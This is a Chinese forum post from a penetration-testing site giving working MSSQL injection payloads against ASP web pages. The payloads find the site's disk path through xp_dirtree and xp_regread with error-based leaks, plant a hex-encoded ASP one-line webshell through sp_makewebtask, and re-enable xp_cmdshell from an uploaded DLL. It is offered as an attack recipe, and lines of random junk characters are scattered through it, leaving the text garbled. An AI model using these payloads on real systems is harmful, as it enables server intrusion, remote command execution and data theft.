中国网络渗透测试联盟
标题:
MSsqlL注入取得网站路径最好的方法
[打印本页]
作者:
admin
时间:
2012-9-13 17:20
标题:
MSsqlL注入取得网站路径最好的方法
好,我们exec master..xp_dirtree'd:/test'
& U! W4 W0 G2 q
假设我们在test里有两个文件夹test1和test2在test1里又有test3
; B! v7 Z6 C4 k6 y
结果显示
' N/ l: f: U7 s( b H
+ i: U+ l- m8 A+ D. O1 e7 i- x! A' E
subdirectory depth
9 B; ~! x2 Q V( W% q4 ?, }
test1 1
0 U$ J3 N3 Q6 \5 C2 p0 S
test3 2
7 K( {7 f" V+ a; f6 X. h0 c
test2 1
6 ~ _5 K9 K( |
3 J" J ]( z* W, V
哈哈发现没有那个depth就是目录的级数
; h' N$ @) a7 w9 |% H( d
ok了,知道怎么办了吧
* S% _+ E% c3 f
% n0 y6 A8 m6 ^2 A) v$ ?
http://www.xxxxx.com/down/list.asp?id=1;create
table dirs(paths varchar(1000),id int)--
3 D% x/ I/ F7 |3 z. u- J
http://www.xxxxx.com/down/list.asp?id=1;insert
dirs exec master.dbo.xp_dirtree 'd:\' --
* F0 z5 x* I' x! A6 }, b6 U o ^* Q
http://www.xxxxx.com/down/list.asp?id=1
and 0<>(select top 1 paths from dirs where id=1)-
: ~7 E! x! R- v
. J4 } }0 N: J; }& K$ e( H
只要加上id=1,就是第一级目录 。
1 H' g# j$ t. `1 V- g
) p+ ~7 Z, }# y
" a) P9 T( l$ M4 O
通过注册表读网站路径:
2 U- r( c( V6 X4 K- _
* x3 S# P# P% F- q
1.;create table [dbo].[cyfd] ([gyfd][char](255));
4 U6 R9 v. c" J, a
; f) S; ~$ `* N2 D: T& r
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--
3 T7 j( U2 S" K2 |
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
9 e3 D$ i7 T# t. B
$ \9 l3 r( d2 b9 ~3 x+ a' c M
3.and 1=(select count(*) from 临时表 where 临时字段名>1)
4 W. Z$ X6 Q2 _. U N: B" ~2 c2 Z
and 1=(select count(*) from cyfd where gyfd > 1)
# `! o, b% {" _2 n$ V6 b3 L8 ^
这样IE报错,就把刚才插进去的Web路径的值报出来了
2 V; x* Q* m& u. g; r( R/ O
L$ j2 \0 G0 ]& f' E
4.drop table cyfd;-- 删除临时表
$ m# x! ^8 e: i& H1 o5 @
! I n. e [- S2 |' M9 r5 p( F
获得webshell方法:
1 X9 }% c, w2 n7 v `# B
1.create table cmd (a image)-- \**cmd是创建的临时表
5 e0 C1 _$ s/ S9 ?+ f$ i. i
7 I2 m$ E% U; [% L
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
" N: v; x1 W4 d0 w( z
& {3 v6 \ x" s. `0 Z/ ^
4 w) ~4 y% t5 Y6 W+ q
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
3 Z- w8 D5 T3 W, M& p! X5 H1 m O
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
2 O; i! ?8 r$ v. P1 D' A: V$ b
# [6 o/ C2 Z' w4 b/ k
4.drop table cmd;-- 删除cmd临时表
8 x/ M$ l# d+ p4 u4 A9 b: R; ^
Q& Q. W+ a; [# ~+ l8 z
恢复xp_cmdshell方法之一:
; M# y1 Q* R1 l. j0 ^6 Y. U
我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
( @/ J& @) c' |1 o) g( S7 x
http://www.something.com/script.asp?id=2;EXEC
master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'
4 l9 D3 V g& x2 b7 \) S6 ^5 O# i
恢复,支持绝对路径的恢复哦。:)
4 I4 P) q, }/ @8 Z* }
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2